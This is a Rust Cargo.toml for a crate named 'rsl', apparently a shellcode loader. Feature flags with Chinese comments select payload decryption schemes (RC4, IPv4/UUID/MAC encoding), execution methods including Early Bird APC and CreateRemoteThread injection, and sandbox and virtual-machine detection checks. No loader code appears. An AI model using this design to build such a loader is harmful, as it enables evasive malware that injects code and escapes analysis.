cargo-features = ["trim-paths", "panic-immediate-abort"]

[package]
name = "rsl"
version = "1.0.0"
edition = "2021"

[dependencies]
tempfile = "3.10.1"
base64 = "0.21.5"
windows-sys = { version = "0.42.0", features = ["Win32_System_Memory", "Win32_Foundation", "Win32_System_Threading", "Win32_System_LibraryLoader"] }
winreg = "0.52.0"
uuid = { version = "1.0", features = ["v4"] }
memmap2 = "0.6.1"
dirs = "4.0"
sha2 = "0.10"
rustcrypt-ct-macros = "0.1"
serde = { version = "1.0", features = ["derive"] }
rc4 = "0.1"
generic-array = "0.14"
typenum = "1.16"

[build-dependencies]
embed-resource = "1.8.0"

[features]
default = ["decrypt_ipv4", "alloc_mem_va", "run_create_thread"]

# 解密算法特性开关
base64_decode = []
decrypt_rc4 = ["base64_decode"]                # 启用RC4解密
decrypt_ipv4 = ["base64_decode"]               # 启用IPv4解密
decrypt_ipv6 = ["base64_decode"]               # 启用IPv6解密
decrypt_mac = ["base64_decode"]                # 启用MAC解密
decrypt_uuid = ["base64_decode"]               # 启用UUID解密

# 内存分配方式
alloc_mem_va = []
alloc_mem_global = []
alloc_mem_local = []

# 注入/执行方式
pattern1 = []
pattern2 = []
pattern3 = []
run_create_thread = ["pattern1"]
run_enum_ui = ["pattern1"]
run_gdi_families = ["pattern1"]
run_early_bird_apc = ["pattern2"]         # Early Bird APC 注入
run_create_remote_thread = ["pattern3"]    # CreateRemoteThread 远程注入

# 虚拟机/沙箱检测特性
sandbox = []
vm_check_tick = ["sandbox"]
vm_check_mouse = ["sandbox"]
vm_check_desktop_files = ["sandbox"]
vm_check_c_drive = ["sandbox"]

with_forgery = []

[profile.release]
opt-level = 3
lto = true
codegen-units = 1
strip = true
debug = false
split-debuginfo = "off"
panic = "immediate-abort"
trim-paths = "all"